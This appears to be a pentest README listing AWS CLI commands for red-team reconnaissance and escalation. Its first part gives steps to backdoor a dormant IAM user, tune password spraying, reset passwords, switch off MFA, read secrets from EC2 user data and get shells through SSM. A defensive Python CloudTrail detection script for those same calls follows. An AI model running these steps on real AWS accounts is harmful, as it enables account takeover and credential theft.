AWS-Essentials-for-Pentest

List of AWS commands which can help gather information about the target. Helpful during pentests and red team engagements to achieve higher privileges or gather information about the network.

Get list of all users:

aws iam list-users

Search the output for the keyword PasswordLastUsed. This gives us an idea of who hasn't logged in for the longest time. If the current AWS keys have administrative privileges or access to ch we can use that to backdoor this user account and stay hidden in the AWS network.

Get password policy:

aws iam get-account-password-policy

This gives a basic idea of what the password policy looks like. It can be used to fine-tune password spraying attacks.

Change the oldest user's password according to the policy:

aws iam update-login-profile --user-name <Name> --password <password>

Get account alias name to login to UI:

aws iam list-account-aliases

Login link (replace <alias> with the account alias returned above): https://<alias>.signin.aws.amazon.com/console

Get MFA details for user:

aws iam list-mfa-devices --user-name <name>

Remove MFA:

aws iam deactivate-mfa-device --user-name Bob --serial-number <serial-number>

Get UserData from running EC2 instance based on instance ID:

aws ec2 describe-instance-attribute --instance-id <instance-id> --attribute userData

This can sometimes give sensitive information like AWS keys or access tokens which can be used to elevate privileges.

Get Route53 Hosted Zones:

aws route53 list-hosted-zones

This gives a list of domains and subdomains, which can be useful.

Get Route53 Resource Records (useful for finding subdomains):

aws route53 list-resource-record-sets --hosted-zone-id <zone>

Script to find Hosted Zones and their records:

#!/bin/bash
# Collect every hosted zone ID ("/hostedzone/<ID>" -> "<ID>") into one file.
aws route53 list-hosted-zones | grep '"Id"' | cut -d'"' -f 4 | cut -d'/' -f 3 > route.53.hosted.zones

# Dump the record names of each zone into a file named after the zone ID.
for i in $(cat route.53.hosted.zones); do
    aws route53 list-resource-record-sets --hosted-zone-id "$i" | grep '"Name"' | cut -d'"' -f 4 > "$i.records.list"
done

# Rename each file after its first record name (normally the zone name, e.g. example.com.record.list).
for i in *.records.list; do
    mv "$i" "$(head -n 1 "$i")record.list"
done

# Collect the per-domain lists in one directory.
mkdir -p domain_list
mv *.record.list domain_list

Get SSM managed instance list:

aws ssm describe-instance-information

This lists the instances managed by AWS SSM. It lets us run commands or get a shell session on them without needing a private key.
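Every command above lands in CloudTrail, so the defender's counterpart to this list is a detection over those records. The following Python triage script is an added example and not part of this repository: it assumes the standard CloudTrail record fields (eventSource, eventName, requestParameters, userIdentity) and uses constructed sample records, not real events. It rates the API calls listed on this page, ignores DescribeInstanceAttribute unless the user data is being read, downgrades self-service password and MFA changes, and flags an actor who runs several enumeration calls in a row.

```python
# (eventSource, eventName) -> base severity; one entry per API call the README lists.
WATCHLIST = {k: "low" for k in [
    ("iam.amazonaws.com", "ListUsers"), ("iam.amazonaws.com", "GetAccountPasswordPolicy"),
    ("route53.amazonaws.com", "ListHostedZones"), ("route53.amazonaws.com", "ListResourceRecordSets"),
    ("ssm.amazonaws.com", "DescribeInstanceInformation")]}
WATCHLIST[("ec2.amazonaws.com", "DescribeInstanceAttribute")] = "medium"  # only when attribute=userData
WATCHLIST[("iam.amazonaws.com", "UpdateLoginProfile")] = "high"           # password reset on a user
WATCHLIST[("iam.amazonaws.com", "DeactivateMFADevice")] = "high"          # MFA removal
def classify(rec):
    """Severity for one CloudTrail record, or None when it is not on the watchlist."""
    sev = WATCHLIST.get((rec.get("eventSource"), rec.get("eventName")))
    if sev is None:
        return None
    params = rec.get("requestParameters") or {}
    if rec["eventName"] == "DescribeInstanceAttribute" and params.get("attribute") != "userData":
        return None  # reading instanceType etc. is routine; only user-data reads matter here
    if sev == "high" and params.get("userName") == rec.get("userIdentity", {}).get("userName"):
        sev = "medium"  # self-service password/MFA changes are expected; cross-user ones are not
    return sev

def triage(records, recon_threshold=3):
    """Group hits by actor ARN; mark a recon burst once low-severity enumeration calls reach the threshold."""
    out = {}
    for rec in records:
        sev = classify(rec)
        if sev is None:
            continue
        actor = rec.get("userIdentity", {}).get("arn", "unknown")
        entry = out.setdefault(actor, {"high": [], "medium": [], "low": 0, "recon_burst": False})
        if sev == "low":
            entry["low"] += 1
            entry["recon_burst"] = entry["low"] >= recon_threshold
        else:
            entry[sev].append(rec["eventName"])
    return out

# Constructed sample records in CloudTrail's JSON shape (not real events; account ID is a placeholder).
def _rec(source, name, actor, **params):
    return {"eventSource": source, "eventName": name, "requestParameters": params,
            "userIdentity": {"arn": f"arn:aws:iam::123456789012:user/{actor}", "userName": actor}}
SAMPLE = [
    _rec("iam.amazonaws.com", "ListUsers", "ci-deploy"),
    _rec("iam.amazonaws.com", "GetAccountPasswordPolicy", "ci-deploy"),
    _rec("route53.amazonaws.com", "ListHostedZones", "ci-deploy"),
    _rec("ec2.amazonaws.com", "DescribeInstanceAttribute", "ci-deploy", instanceId="i-0abc", attribute="userData"),
    _rec("ec2.amazonaws.com", "DescribeInstanceAttribute", "ci-deploy", instanceId="i-0abc", attribute="instanceType"),
    _rec("iam.amazonaws.com", "DeactivateMFADevice", "ci-deploy", userName="bob"),
    _rec("iam.amazonaws.com", "UpdateLoginProfile", "ci-deploy", userName="bob"),
    _rec("iam.amazonaws.com", "UpdateLoginProfile", "alice", userName="alice"),
]
```

Run `triage(SAMPLE)` to see the ci-deploy principal flagged for a recon burst plus two cross-user credential changes, while alice's own password change only rates medium.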
